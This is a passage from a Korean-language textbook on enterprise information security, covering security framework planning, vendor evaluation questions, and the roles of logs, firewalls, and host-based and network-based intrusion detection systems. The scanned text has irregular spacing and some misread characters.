보안틀거리개발에는 두가지 기본방법이 있다. 그 하나는 봉사기로부터 시작하여 사 
업을 바깥쪽으로 나가면서 하는것 이 다. 

이 방법은 일차적인 자료원천에서 보안과 기업을 통합시키는 장점이 있다. 그러나 
분권화된 정보기술기관들에서는 의뢰기로부터 안으로 들어 가면서 보안수준을 점차 높이 
는것이 더 좋은 방도로 될것이다. 

의뢰기로부터 안으로 들어 가는 방법에서 리용할수 있는 한가지 수법은 매 의뢰기를 
퓨터 앞에 스마트카드읽 기 구동장치 들을 설 치 하여 스마트카드를 통한 현지 인증을 하게 하 
는것이다. 이러한 기능은 후에 더 확장하여 망에 대한 단일개시신호에 의한 접근이나 기 
타 기능들을 더 추가할수도 있을것이다. 이 방법의 불리한 점은 의뢰기가 추가，삭제，판 
본갱신 등으로 하여 그 수가 계속 변하기때문에 그 수자측정이 곤난하다는것이다. 이 방 
법 으로 하면 보호해 야 할 전략적 으로 중요한 봉사기 자료들은 흉쳐 가지 못할수 있다. 

기술기능평가 

보안구현모형 이 선정되 였으므로 이제 는 기술기능항목서 를 작성 하는것 이 필요하다. 
이 기술기능항목들은 적중한 인원선정과 강습요구수준을 정하는데 필요하다. 기준에 기 
초한 공개적인 보안장치들을 사용하면 독립적인 환경에서 수많은 사람들을 강습 주어야 
할 필요성이 최소화될수 있을것이다. 

높은 준위의 작업흐름도를 준비하여 개발림에 들어 가야 할 해당 단위들을 찾아 내 
는것이 좋다. 모든 련관단위를 갈라 내고 매 단위의 동원인원들을 찍어야 한다. 공간을 
조절하여 설비를 물리적으로 고립시키는것이 필요하면 건물공사도 할수 있다. 

이 단계 에 서 개 발림 조직은 정 보기 술단위 와 기 타 단위 들에 서 사람들을 동원하여 할수 
있다. 모든 부서들이 이 보안틀거리설계에 다 참여하게 하기 위하여 말단사용자부서들은 
개발림들에 자기 대표들을 파견할수 있다. 
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규모설정과 자원계획화 


설계공정에서 다음으로 중요한것은 개발계획의 규모를 예견하며 자원계획을 잘 짜는 
것 이 다. 바로 여 기 에서 보안틀거 리 개 발계 획 이 다른 정 보기술개 발계 획들과 맞물림새 를 잘 
맞추어야 한다. 완성된 정보기술예산안과 동원인원계획을 검토해 보는것도 필요하다. 일 
부 경우에 개 발계 획 에서 우선권준위 도 조절할 필요가 있을것 이 다. 보안관련세부과제 들도 
부류별로 묶어 순서를 일관성 있게 잘 정해야 할것이다. 그것은 그 의존성관계가 이미 
총 틀거 리 에 서 반영 되였기 때문이 다. 

그 어떤 주요정보기술계획에서나 하나의 세부계획에 대해서도 가격 대 성능 비교선 
택대안들이 제기되고 분석되여야 한다. 이전에 실행된 기업요구 및 보안방책개별분석에 
서는 공격위험에 대처하여 수많은 자원들을 물리적으로 고립시키는것으로 결론을 찾은것 
같다. 이런 경우에는 하드웨어/쏘프트웨어기술에 의한 대안리용으로 나가면 기업전반에 
걸쳐 자원을 보다 최량화할수 있으면서도 보안도 더 잘 보장할수 있다. 

현지인증방법에는 간단히 사용자의 망주소를 검증하는 방법으로부터 시작하여 정교 
한 생체검측지표를 리용하는데까지 이르는 등 위력과 비용이 각이한 여러가지 방법들이 
있 다. 

또한 하드웨어와 쏘프트웨어결합을 위해 가격 대 성능 비교대안들을 잘 평가해 
보는것도 중요하다. 실례 로 보다 강력한 UNIX 제 품을 쓰는것보다 Windows / NT ( r ) 를 쓰 
는 방화벽을 구현하여 기능확대출력이 약간 부족한 점을 찾는것이 비용 대 효과면에 
서 훨씬 낫다고 볼수도 있다. 이것은 정보기술기관안에 있는 기술진의 권고에 의한 
결정일것이다. 


기술업체의 선정 


높은급의 보안방책 들과 개 발계 획 이 작성된이상 이제는 제 공된 제 품을 평 가하기 위하 
여 보안제품판매업체를 분석해 야 한다. 현지 정 보기술자원을 보충하며 모든 부품들의 대 
면부를 적절히 맞추기 위 해서는 체 계통합사업자가 필요할수도 있다. 정보보안제품에 대 
한 제 안의 뢰 서 ( RFP ) 와 자료의 뢰 서 ( RFI ) 들은 상당히 방대하며 따라서 가장 중요한 특성 들 
인 다음의 지표들을 포함하여 야 한다. 

• 성능, 규모조절. 보안실행에서 얼마만한 지연을 가져 왔는가，그리고 사용자와 
자원들이 체계에 추가되면 어느정도로 대안이 규모조절될수 있는가. 

• 강력성. 대 안이 복잡한 공격에 어느정도로 안전한가. 

• 무결성. 대안이 얼마나 넓고 깊으며 어떤 환경에 그 대안이 가장 적중한가. 

• 운용호환성. 제기된 환경에 대안이 얼마나 잘 융합될수 있는가. 

• 지원 및 사용성. 대안이 얼마나 사용성이 있으며 지원 및 보수특성은 어떤것 
들 인가. 
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이 다섯가지 기본특성들에 맞게 다음과 갈은 포괄적인 질문들을 판매업체의 제품들 
에 제 기 해 보아야 판매 업체를 평 가할수 있으며 해 당 정 보기 술환경 에 대한 기 타 문제 점 들 
도 명백히 해결해 나갈수 있다. 

1. 접근조종，인증，사적비밀，무결성 및 부인방지라는 다섯가지 보안기능들중에서 
어느것 이 제품에 반영되여 있으며 그 작용은 어떠한가. 

2. 제 품이 방지하게 되 여 있는 공격 형 태 들은 어 떤것 인가. 

3. 제 품이 가장 잘 들어 맞을 세밀도 (network granularity ) 준위 는 어떠 한가(즉 의뢰전 
용，국부의 뢰기/봉사기 용，싸이 트용，기 업 전반용 및 기 업호상용준위) 

4. 제 품이 가령 어 떤 암호화수법 을 리용하는가. 

5. 그 암호화기술의 원산지가 미국인가，그렇다면 통보문이 나라들사이에 오갈 때 
암호화수준이 《 약해 지》는가，그리 고 약해 지 면 어 느 정도인가. 

6. 제품이 보증과 서명 을 리용하는가，구성구조를 서술한다. 

7. 누가 보안검 사를 진행하였는가，결과를 제 시한다. 

8. 어느 표준에 그 제품이 부합되는가，그리고 사유부가품들은 어느 곳에 추가되였 
는가. 

9. 제품이 《자기 집밖에서》볼 때 어느 3자의 보안관련제품과 호상운용성을 가지 
는가. 

10. 제 품이 보안관문，보안관리프로그람 등과 같은 기 관의 현존보안제 품들과의 대 면 
상태 가 어 느정 도로 정 확한가，수정해 야 할 곳은 어 느곳인가. 

11. 제품이 수정변경없이 잘 가동할수 있는 제 안된 가동환경，응용프로그람，도구들 
은 어떤것들인가. 

12. 제품이 모든 지원가동환경들에서 꼭같이 기능을 수행하는가 아니면 다른 지원체 
계 나 훈련이 필요한가. 

13. 제품의 사용가능성수준들은 어떤가(례하면 정상적인 유지보수가 필요한가 아니 
면 매일 24시간 매주 7일 기준의 주기적인 유지보수가 필요한가). 

14. 제품관리는 어떻게 하며 제안된 체계나 망관리기반과 쉽게 통합되는가. 

15. 제품지원은 판매업체가 제공하는가 아니면 해외조달해야 하는가，판매업체가 기 
업에 절실한 환경을 24시간동안 지원하는가. 

16. 제품이 부서간，지역간 그리고 가능하면 기업간 거래를 지원하는가，얼마나 정확 
히 지원하는가，판매업체가 이 기능과 관련한 참조싸이트들을 가지고 있는가，참 
조싸이트들에 기 초하면 제 품들이 어 느정 도로 사용에 편 리한가. 

17. 제품들을 단번에 다 배 치해야 하겠는가 아니면 단계적으로 도입할것 인가，즉 제 
품들이 잡탕환경 에 서 운영 되 여 례하면 안전한 사용자와 불안전한 사용자사이 의 
통신이 가능한가. 

18. 사용자들과 안전한 자원들이 추가되는 조건에서 대안의 규모조절능력에 대한 정 
량적 인 정 보를 제 시한다. 
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실행과 시험 

개발계획을 실행하면 계획단계에서는 나타나지 않던 문제점들이 언제나 나타나게 된 
다. 그렇기때문에 심중히 계획을 작성하며 관리하기 쉽고 명백히 구별된 과제들을 선택 
하여 개 발계 획을 짜야 하는것 이 다. 

실 행 과정 이 설 계，개 발，시 험 그리 고 마지 막으로 설 치 에 까지 이 르므로 새 로운 요구사 
항들을 이 과정에 도입하지 말아야지 크게 지연할수 있는 가능성이 농후하다. 새로운 요 
건들은 모았다가 개발계획을 수정 할 때 류사한 과정을 거쳐 리용할수 있을것 이 다. 

개발계획의 시험단계가 끝나면 유연하게 이행하기 위해 기업의 기간체계들은 방해하 
지 않는 국부적 인 조종시험을 진행해야 한다. 조종은 통제적인 환경에서 실지 설정에 가 
능한 한 가깝게 일치되여야 하며 가능한껏 오래 진행하여 그 기술은 물론 보안틀거리개 
발에 리용된 공정들과 실천들을 검증하게끔 되여야 한다. 

결 론 


이 장에서는 정보기술보안실행의 기본단계들인 검사，요구조건분석，틀거리구성，개 
발계획작성，실행을 보았는데 주로 보안틀거리실행에 유익한 일부 수법들과 고려해야 할 
주요문제 점 들을 중심 으로 개 괄하였 다. 

기업보안에 대하여 서술한 이 장에서는 비법접근으로부터 기업정보를 보호하는데서 
나서는 보안요구조건들과 구체적 인 설계공정 그리 고 기 업전반의 보안체계실행 을 전반적 
으로 고찰하였다. 이 보안체계를 실현하기 위한 일련의 대안들이 해당 과정에서의 권고 
안들과 함께 서술되였다. 효과적이며 성과적인 보안실행을 위한 지침도 제시되였다. 

기업정보보안은 다음과 같은 다섯가지 측면에서 보아야 한다. 

1. 인증 

2. 접근조종 

3. 사적비밀보존 

4. 무결성 

5. 부인방지 

기 업보안체 계 가 잘되 려 면 이 기 능들을 현존 정 보기 술환경 과 잘 통합시 켜 야 하며 그 
결 과 최 종체 계 는 다음의 특성 들을 가져 야 한다. 

• 유연성이 있어 정보기술관리가 보안수준조종을 할수 있는 능력을 가질수 있어야 한다. 

• 사용자들에게 줄수 있는 혼란이 최소화되여야 한다. 

• 비용효률이 실행에서 높아야 한다. 

• 기 업망이 계속 늘어 나고 기 관적범위 와 지 리적경계 가 계속 뻗 어 나가는데 맞게 
쓸수 있 어 야 한다. 보안체 계 는 기 업 밖의 기 관들에 도 운용호환성 이 있 어 야 한다. 
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제 2 5 장. 기업보안정보관리 


마툰다 난차마 
애너 월슨 


오늘의 기업환경과 콤퓨터사용환경은 무엇이 신뢰성 있고 무엇이 신뢰성 없는가 하는 
전통적인 경계선을 다 모호하게 만들었다. 결과 각 기관들에서는 자기들의 정보를 보호하기 
위하여 여러가지 조치들도 취하고 있다. 기관의 망에서 여러 원천을 통하여 나오는 정보들 
은 보안관리에서 관건적문제로 된다. 이런 정보들이 나오는 원천으로서는 보안장치들(침입 
람지체계와 방화벽)，조작체계들，교환기나 경로기와 갈은 망장치 등 수없이 많다. 

일반적으로 이 장치들은 매개가 하나의 기능을 수행하여 전반적기업의 요구에 순응 
하며 결국에는 기업의 보안태세를 확립하는데 기여한다. 또한 이 기술들은 각각 콤퓨터 
사용환경에서 전반보안관리의 한 부분을 맡고 있는것이다. 총체적으로 이 기구들은 커다 
란 정보를 생성하는것이다. 

우리 앞에 나선 어려운 과업은 이 모든 정보들을 리해하고 콤퓨터사용환경을 보호하 
는데 유리하게 그리고 전반적기업에 리롭게 관리하는것이다. 이렇게 하기 위해서는 우선 
자기의 기술에 정통하며 그 기술의 정보를 어떻게 종합하고 해석하는가, 어느 점에서 사 
람이 개입해야 하는가를 잘 리해하여야 한다. 이렇게 료해를 잘 하면 기업보안정보관리 
에 가장 좋은 전략을 가지고 자기식대로 처리해 나갈수 있게 된다. 

이 장에서는 종합，분석，호상관계를 통하여 기관의 보안태세를 강화하는데 목적을 
두고 보안정보를 관리 하는데서 나서는 문제점들을 보려 고 한다. 

이 장에서는 또한 보안관리에 필요한 정보원천들과 그 원천들이 생성하는 정보의 성 
격 에 대 하여 해 설 하려 고 한다. 이 미 토론된 기 술들가운데 는 침 입탐지 체 계 ( IDS ), 방화벽， 
경 로기，교환기，조작체계 가 있다. 보안관리에서의 그 기 본기능，정 보수집방식，정보분석 
방법 들도 구체 적 으로 고찰하여 기 업 전체 적 인 보안관점 을 세 운다. 이 정 보수집방도들과 
정보관리공정에 대한 통지문제를 고찰한다. 이러한 리해에 기초하여 보안정보의 전반적 
관리 를 위한 여 러 가지 전략들을 투시해 볼수 있 다. 또한 보안효과를 높이 는 견지 에 서 보 
안관리의 문제점들과 이 정보의 관리에서 나서는 난점들을 훑어 볼수 있다. 그 목적은 
기 술과 사람을 가장 효과적 으로 결 합시키 는 방법 을 찾고 기 업 환경 을 안전하게 유지 하기 
위하여 정 보보안일 군들을 더 잘 무장시 키 자는데 있 다. 

이 장의 자료들은 해당 참고도서들과 련관시켜서 읽어야 한다. 여러가지 망기술과 
보안기술에 대하여 서술하면서 필자들은 그에 대한 정보의 성격을 리해하며 이 정보들을 
리용하여 기업의 보안을 어떻게 보장하겠는가를 리해시키려는 의도로부터 출발하였다. 
이 장이 그러한 기 술들에 관한 독자적 인 기 술참고서 로 되 게 하기 위하여 구체 적 인 기 술 
세 부들'은 깊 이 다치 지 않았다. 그러 나 이 장은 다음과 같은 문제 즉 기 업보안정 보의 필 
요성 과 그 원천(침 입탐지체 계，방화벽，체 계사용기 록부，교환기와 경 로기)에 대 하여 고찰 
한다. 
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기업보안관리와 관련한 일부 전략들은 7편에서 론의된다. 이 전략들에는 종합 및 분 
석전략들에 대 한 방법 들도 있다. 이 편에 는 또한 취 약성자료들을 기 업위 험 과 결부시키 는 
데 서 나서는 난점 들도 언급한다. 

기업보안정보의 원천 


장의 이 부분에 서 는 보안정 보의 필요성 과 그 원천，이 정 보가 기 업보안관리 에 어 떤 
도움을 주는가에 대 하여 주로 고찰한다. 

보안정보의 필요성 

지난 10년간 기 술，전문가，보안관계 정보 등 정 보보안문제 들이 굉 장히 많이 생겨 났 
다. 일상생 활과 상업 의 모든 분야에 서 콤퓨터 와 망들이 노는 중심 적 인 역 할에 의하여 생 
겨 난이러한 방대한 문제들은 물리적울타리밖에까지 미치게 되였다. 망통신은 이제 개 
인이나 기관들의 직접적통제를 벗어 나는 그런 규모로 확대되였다. 또한 모두가 자기의 
《 령 지》에 서 통제 하려 는 노력 의 일 환으로서 오늘에 는 보안기 술들이 개 발되 여 광범 위 하 
게 상업화되는 정도에 이르렀다. 

한편 망통신은 복잡한 체 계 들이 각이한 망설 비 와 장치 들로 구성 되 지 않으면 안되 는 
결과를 초래하였다. 뒤 따라 개 발되는 체 계 에서 정 보를 얻 어 망과 콤퓨터 자원들의 현행관 
리 에 쓴다. 이 정 보는 분석 되 여 야 그것 이 생 산의 환경 을 더 잘 리해할수 있 을것 이 다. 

전반적으로 보면 보안정보는 기관내의 전체 체계들에서 생산된 총 정보의 한 부분인 
것이다. 이러한 보안정보는 보안과 관련된 결심을 채택할 때 매우 중요하다. 이 정보가 
없이는 눈이 멀어 가지고도 잘 되겠지 하고 생각하면서 승용차운전대를 잡는것과 갈다. 
보안체계와 장치에서 생기는 정보의 가치는 콤퓨터사용환경을 어떻게 가장 잘 보호하고 
관리하겠는가에 대 하여 박식 하고도 경제성 있는 선택 을 할수 있게 하는데서 유익하다. 

검 사기 록부이 든 방화벽기 록부이 든 침 입 정 보이 든 이 모든 정 보들은 각이한 측면에 서 
쓸모 있 다. 

체 계의 활동성격 을 결정 하기 위하여 체 계를 검사할 때 쓰인다. 

일상적 으로 특히 보안사고일 때 진단프로그람을 실행 시키 는데 쓰인다. 

법정분석에도 필요하며 이것은 사건해결의 중핵을 이룬다. 일반적으로 보안정보는 
기 업의 보안을 결정하는 중요한 정 보이 다. 

보안정보의 원천 

정보보안관리가 효과적으로 되려면 기업전반에 걸치는 각이한 정보조각들을 다 필요 
로 한다. 각이한 원천에서 나오는 이 정 보는 기 업의 보안정 보를 완성하는데 기 여한다. 매 
조각의 정보는 그 내용만큼 유용하다. 이 정보들을 종합하여 전반적인 보안태세를 더 잘 
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리해할수 있게 된다. 

아마 가장 가까운 보안정 보원천은 조작체 계 의 사용기 록부이 다. 조작체 계 사용기 록부 
는 아마 보안행정관리가 오늘처럼 자리 잡히기 이전부터 콤퓨터들의 공통적 인 특성으로 
되여 왔다. 이 기간 체계행정관리자들은 체계기록부를 리용하여 누가 무엇을 언제 어디 
에서 어떻게 하였는가에 대한 콤퓨터환경을 비교적 구체적으로 관리하게 되였다. 

망들사이의 호상련결이 강화됨에 따라 내부망들을 외부망들에 련결하려는 요구가 
날을 따라 높아 가고 있다. 신뢰성 없는 망들에 련결하려면 내부망과 외부망들사이의 
통신을 통제해야 할 필요가 생긴다. 바로 이런 역할을 하는것이 내부망과 외부망에서 
관문의 역할을 수행하는 방화벽이다. 방화벽은 오늘의 망에서 하나의 공통적인 특성이 
다. 조작체계들이 체계활동에 관한 기록부들을 만들어 내듯이 방화벽들도 관문에서 활 
동을 주적 한다. 

조작체 계 사용기 록파일 들이 체 계 상의 활동들을 기 록하며 방화벽 들이 관문을 통과하는 
활동들을 조종하고 기록하는 조건에서 망이 외부공격에 대하여 안전하지 않겠는가고 생 
각할수도 있다. 이것이 옳은가，그렇지도 않다. 그것은 어두운 곳에서 모험을 하는자들역 
시 상당히 령 리한자들이기때 문이 다. 그자들은 이미 구죽한 방어체 계를 에돌아 《 뒤문치 
기》를 하여 통신규약이나 절차，응용프로그람이나 조작체계상의 약점들을 교묘히 리용 
하는 묘리를 알고 있다. 

이것은 침입감시체계를 세워 방화벽요새를 보강할 필요성을 강조해 준다. 침입람지 
체계 ( IDS ) 는 를퓨터망에 현시된 사건에 대한 정보를 제공한다. IDS 는 의심스러운 망활동 
을 추적하면 그것 이 공격 시 도인가 람지 인가 아니 면 성 공한 침 입인가를 알수 있 다. IDS 가 
제공하는 정보를 보면 내부체계들과 관문에서 놓쳤거나 보지 못했던 약점이나 구멍들을 
알수 있다. 이 렇게 되면 좋은 기회 를 얻 어 보안약점 과 구멍들이 초래한 부족점들을 강화 
하거나 메물수 있게 된다. 

체 계 들과 방화벽 들 그리 고 IDS 는 서 로 각이하나 호상 보안적 인 역 할을 하여 안전상 
태 를 강화한다. 이 매 개의것들은 콤퓨터사용환경 에서 하나의 구체적 인 역 할을 수행한다. 
그러나 사실 그것들사이의 경계는 여기에서 설명되는것처럼 그렇게 명확하지는 않을수도 
있 다. 또한 그것 들의 역 할이 각이한것 만큼 그것 들이 생 성하는 정 보형 태，정 보수집방식， 
분석 및 해 석방식 에 는 차이 가 있 다. 

보안정보는 망에서 쓰이는 교환기나 경로기에서도 받을수 있다. 

경로기나 교환기는 망시설에서 사활적인 역할을 하며 하부구조의 마디들에서도 중요 
한 요소이다. 

각이한 원천으로부터 오는 이 정 보들이 종합되 면 기 업 보안에 대 한 전체 적 인 모습이 
엄 어 지 게 된다. 이 것 들도 종합하여 호상관계 가 밝혀 지 면 보안관리공정 에 도움이 될수 
있는 방식 과 추세 가 산출될수 있다. 실례 로 이 런 정 보를 리용하여 보안사건관리 를 향상 
시키고 배운 경험으로 이와 류사한 사건들의 관리를 잘할수 있으며 사건관리를 사건대응 
방식 이 아니 라 사전대 책방식 으로 전환시 킬수 있을것 이 다. 

보안정 보를 적 중히 활용하고 관리하면 우리 의 현 콤퓨터 사용환경 이 총체 적 인 보안상 
《건강》의 처 방도 내릴수 있다. 
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침입탐지체계 ( IDS ) 


이 부분에서는 IDS 를 중심 으로 이것 이 무엇 이 며 기 업보안관리에서의 역 할은 무엇 인 
가를 설명하려 고 한다. IDS 는 기 업의 건강상태의 맥 박을 짚어 보는 도구라고 할수 있다. 
이 체계는 변칙적 인것들과 이미 알려 진 공격 에 토대하여 있을수 있는 공격과 침 입을 람 
지 하고 경 보신호를 울린 다. 변칙 적 인것 으로 인식 하고 어 떤 활동을 알려 진 공격과 련결 
시켜 보는것 은 다 제 한이 있 다. 

간단한 소개 

IDS 는 기 업의 보안을 감시 하고 시 행하는데서 하나의 중요한 역 할을 한다. 이 체계들 
은 흔히 최전방에 배 치하여 활동을 감시 하고 필요한 행동 즉 해 당 활동을 기 록하며 경보 
기 나 휴대 형호출기 를 울리 거 나 전자우편을 해 당 사용자들에 게 보내 여 주의 를 주는 행 동 
을 하게 된다. 

IDS 는 의심되는 플래그 ( flag ) 활동을 람지하고 해당한 행동을 촉발시킨다. 망상의 통 
신내 용을 감시 하거 나 특정한 호스트에서의 의 심되 는 변화들을 감시 하든 관계 없이 IDS 는 
기 관의 《 적 극적 보안》의 한 구성 부분으로 된다. 

IDS 는 끝없이 제기되는 보안상의 도전들에 직면하게 되므로 계속 갱신되여 가고 있 

다. 이 도전들에 는 IDS 람지 를 피 하는 해 커 들의 교묘한 수법 들을 따라 가며 대 처하는 문 

제 도 포함된 다. IDS 는 또한 자기 를 파괴하려 는데 목적 을 두는 봉사거 부공격과도 싸우지 
않으면 안된다. 

일 반적 으로 침 입람지기 술은 상대 적 으로 청 소하다. IDS 의 구성 이 어 떤가에 대 한 보안 
전문가들의 의견에 는 일 련의 차이 점 은 있으나 기 업보안관리 에서 IDS 가 노는 역 할에 대 

해서 는 실질적 으로 의견일치 가 존재한다. 또한 IDS 정 보의 분석 이 보안관리의 보조수단으 
로서 필요하다는데 대 해서 는 의견일 치 가 있 다. 흔히 IDS 는 분석 을 가하고 행동을 부여하 
면 기 업보안을 개 선하는데 도움을 주는 정 보의 주되 는 원천 인것 만은 틀림 없 다. 

리상적인 IDS 는 그 기능을 특징 짓는 여러가지 자동화된 구성요소들을 가지고 있는 
데 그 대표적 인것들을 보면 다음과 같다. 

• 콤퓨터체계나 망에서 일어 나는 사건들에 대한 정보를 제공하는것， 

• 그 정 보를 분석하여 보안과정 에 도움을 주는것， 

• 보안에 예민한 사건정보를 기록하고 보관하며 앞으로 사용하여 개선에 도움을 
주는것， 

• 그 정 보에 대 한 행동을 하여 보안을 형성시키 는것， 

• 우의 모든것 들을 결점없 이 제때 에 시 행하는것. 

우의 사항들은 모든 보안전문가들에게 있어서 최종적인 IDS 의 리상이다. 실지 이러 
한 체계가 존재하는가 안하는가 하는것은 다른데서 론의할 문제이다. 
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IDS 의 감시방법 에 는 두가지 기 본방식 이 있다. 즉 지 식기지형탐지 와 변칙탐지 의 두가 
지 가 있 다. 또한 IDS 설 치방식 에 도 두가지 기 본전 략이 있 다. 즉 망상설 치 와 호스트상설 치 
이 다. IDS 와 사건대 응사이 에 는 밀접한 관계 가 있으므로 이 것들을 사건대 응과 관련시켜 
개별적으로 고찰하겠다. 

지식기지형침입탐지체계 

지식기지형 IDS 라고 하는 오용람지식 IDS 는 오늘 가장 널리 쓰이는 기술이다. 이러한 
IDS 에 는 표적 에 기 초하여 이 미 알려 진 공격 과 취 약점 들에 대 한 지 식 이 축적되 여 있 다. 
해커들의 묘한 기법이 남긴 공격표적들이 담겨 져 있는 지식기지를 리용하여 이 IDS 는 
사건형태들과 공격표적들을 비교한다. 공격시도가 탐지되면 IDS 는 경보를 울리고 사건을 
기 록철 에 올리 고 휴대 형호출기 에 신호를 보내 거 나 전자우편을 보낼수 있을것 이 다. 

지 식기지형 IDS 는 간단하여 실행 과 운영 이 쉽다. 또한 공격 을 신속정 확히 탐지하는 
데 매 우 효과적 이 다. 공격표적들을 끊임 없이 갱 신하거 나 동조하는 방법 으로 허위경보들 
을 줄일수 있다. 그 과정에 보안전문가들은 자기들의 전문기술수준에는 관계없이 사건대 
응수준을 매우 효과적 으로 높일수 있게 된다. 

이 오용람지형 IDS 에는 하강선도 있을수 있다. 즉 지식기지에 있는 정보가 최신것으 
로 계속 갱 신되 여 야만 효과가 최 상으로 된다. 이 미 규제한 규칙 이 나 공격표적 들은 끊임 
없 이 갱 신하지 않으면 안된다. 또한 해커의 묘기 가 공개된 시 간과 해 당 공격표적 을 엄 을 
수 있는 시간과의 시간차도 있을수 있다. 

이것으로 하여 새롭고 람지하지 못하는 공격이 있을수 있는 공간이 있다. 

자기가《모르는》수많은 공격형태들에 《눈이 멀게》되는 현상이 생기게 된다. 그 
것은 특히 IDS 의 지 식기지의 갱 신에서 시 간차가 크게 있는 경우에 더 욱 그러하다. 

변칙탐지 (행우 I 형 IDS ) 

행위형 IDS 라고도 부르는 이 변칙탐지 IDS 는 이상적 이거 나 보기 드문 행위들을 발견해 
낼수 있 다는 전제 하에 동작한다. 호스트나 망상에서 변칙 적 인 행 위 들은 정상적이 며 합법 적 
인 행동들과 구별될수 있다. 이 차이들을 리용하면 어떤것 이 공격 인지 알아 낼수 있다. 

어 떤것 이 변칙인가를 결정 하기 위해 일정한 기 간 호스트 혹은 망상에서 의 정 상적 인 
사용자활동을 보여 주는 프로파일들을 구축한다. IDS 는 또한 사건자료들을 수집하고 여 
러가지 계 측자료들을 리 용함으로써 감시 에 포착된 활동이 《 정 상활동》으로 생 각되 는것 
과 비 교하여 랄선행 위 인지 아닌지 를 결정한다. 

이러한 정상행위를 결정 짓기 위해 다음의 기법들을 일부 혹은 전부 또는 결합하여 
쓸수 있다. 


• 규칙 

• 통계 학적 측정 값 

• 림계값 
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그러나 이 체계도 정상행위로 생각되는 활동의 방식들이 극적으로 변하거나 움직일 
수 있으므로 허위경보를 낼수 있는 가능성이 있다. 

행위형 IDS 의 주요한 우점은 공격에 대한 특별한 초기지식이 없이도 새로운 공격형 
태 들을 탐지할수 있는것 이 다. 또한 변칙탐지 에서 생성된 정보를 리용하여 지 식기지형 
IDS 에 쓸수 있는 공격방식 들을 규정할수 있는 가능성 도 있 다. 

호스트형침입탐지체계 

호스트형침 입탐지체 계는 해 당 호스트에 설치하여 거 기 에서 감시 활동을 진행한다. 호 
스트형 IDS 는 체 계 에 따르는 특성 에 있 다. 호스트형 IDS 는 체 계 검 열 기 록부，체 계 기 록부，응 
용프로그람기 록부들을 리용하여 IDS 정 보를 만든다. 체 계의 여 러 가지 기록부들을 리용하 
면 IDS 에서 쓸수 있는정도의 정보가 된다. 해당 조작체계와 관련되는 정보라고 할 때 그 
정보의 정확도는 상당히 높은것이다. 그것은 그 조작체계가 자기가 동작하는 호스트의 
모든 활동을 정확히 기록하기때문이 다. 

호스트형침입방지체계는 플래그신호가 있는 사건이 호스트에서 일어날 때 반응한다. 
이러한 행동들로서는 파일변화，특권위반 혹은 보안적으로 예민한 행동이 해당된다. 이것 
으로 하여 호스트형 IDS 는 무결성 에 대 한 공격을 람지 하는데 매우 효과가 크다. 조작체계 
의 검 사흔적을 리용하면 그 과정 에서의 탐지의 불일 치 를 통하여 트로이목마나 기 타 류사 
한 공격을 예견할수 있다. 

호스트형 IDS 의 또 하나의 우점은 망에서 쓰이는 IDS 가 잡지 못하고 스쳐지나보내는 
공격들도 탐지할수 있는 능력 이 다. 정 보원천이 어 디 에서 생성 되는가에 따라 호스트형 람 
지 체계는 망전송정 보들이 암호화된 환경 에서도 동작할수 있다. 교환기술이 망에 리 용된 
경우에도 이 호스트형침 입람지체계는 영 향을 받음이 없이 작용한다. 

호스트형 IDS 에 일련의 부족점들이 있다. 대개 특정한 체계 나 응용프로그람을 위하 
여 제작되는것으로 하여 이 호스트형 IDS 는 운용호환성이 높지 못하다. 또한 한 가동환경 
을 지원하는 IDS 가 다른 가동환경은 지원하지 않는 경우도 있다. 체계와 응용프로그람에 
각이한 복잡한 환경 에서는 매 체계 에 서 로 다른 호스트형 IDS 를 설치하려는 생각이 들수 
도 있다. 이렇게 되면 각이한 IDS 를 가진 복잡한 환경 이 조성되는데 이것으로 하여 각이 
한 체계 에서 나오는 모든 정보들을 감시 하고 관리하는데서 또 문제 가 생기기 쉽다. 

이러한 부족점에도 불구하고 호스트형 IDS 는 아직도 중요한 도구로 되고 있다. 그것 
은 이 호스트에 있는 자원들이 바로 해커들이 많이 노리는 목표이기때문이다. 이것도 역 
시 하나의 약점이다. 망에서 IDS 를 실행시키는 어느 한 호스트가 공격을 받는다고 생각 
해 보라. 그 호스트에서 첫째가는 타격목표가 어느것이겠는가? 

망형침입탐지체계 

망형 IDS 는 설 치된 해 당 망토막에서 망을 통한 전송흐름들을 감시한다. 이 체 계는 매 
파케트들을 분석하여 일체 변칙적인것들을 탐지하거나 이미 알려 진 공격표적들과 포착 
된 파케트를 방식비 교하는식 으로 람지 한다. 파케트정 보에 기 초하여 이 IDS 는 적 대적 으로 
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생각되는 모든것 혹은 적대적인 활동이라고 규제된것과 일치되는 형태들도 찾아 내려고 
노력 한다. 

파케트분석에서는 하나의 난관이 있는데 그것은 여기에서 분석된 정보가 호스트형체 
계에서만큼은 명백하지 못할수도 있다는 점이다. 여기서는 사실 상당한 정도의 추리를 
하여야 관찰된 형태나 람지된 표적들이 적대활동으로 되는가 안되는가를 판정해 낼수 있 
다. 그것은 파케트의 물리적원천은 결정할수 있으나 그 원천뒤에 누가 있는지 알수 없기 
때 문이 다. 

망형 IDS 는 비침투성과 스텔스특성을 비롯한 일련의 주요한 장점을 가지고 있다. 자 
기가《살고 있는》호스트에 영향을 주는 호스트형 IDS 들과는 달리 망형 IDS 의 성능은 체 
계 에 영 향을 주지 않는다. 또한 망형 IDS 파케트분석 은 일정한 형 태의 파쇄성 공격때 에는 
호스트형체계 에 비 하여 더 유리하다. 

망형 IDS 의 주되는 하나의 약점은 망전송량에 비한 규모조절능력이 없는것이다. 전송 
량이 많은 경우 매 파케트를 검사하는 능력이 이 IDS 에서 문제로 나선다. 결과 파케트를 
잃어 버리는것 이 다. 이 렇게 파케트를 잃는 량이 많은 경우에는 관리해 야 할 IDS 정 보가 
그만큼 적어 지는데 그 정보가 바로 해당 보안에서 치명적인 정보일수도 있지 않는가. 

여러가지의 IDS 기술들의 장점과 단점을 다 보고 났으니 아마 가장 효과적인 방도는 
이 모든것의 적중한 결합이 라는것은 명백해 진다. 

IDS 선택과 배치 

IDS 의 선택과 배 치를 잘하려면 수많은 요인들을 고려해 야 한다. 즉 

• 그 목적 이 무엇 인 가 즉 호스트형 침 입 탐지 인 가 아니 면 망형 침 입 탐지 인 가. 

• 만일 망형 IDS 이 라면 대 용량전송량에 대 비할수 있는 규모조절능력 

• 지식기지형인 경우 공격표적의 범위 혹은 정확한 변칙탐지를 수행할수 있는 능력 

기타 배치와 관련한 요소들로는 분석되는 정보량，요구되는 분석도，감시하려는 침입 
이나 공격의 중요도 등이다. 

IDS 를 어디에 배치하겠는가 하는것은 감시하려는 형태의 활동에 따라 다르다. 보안 
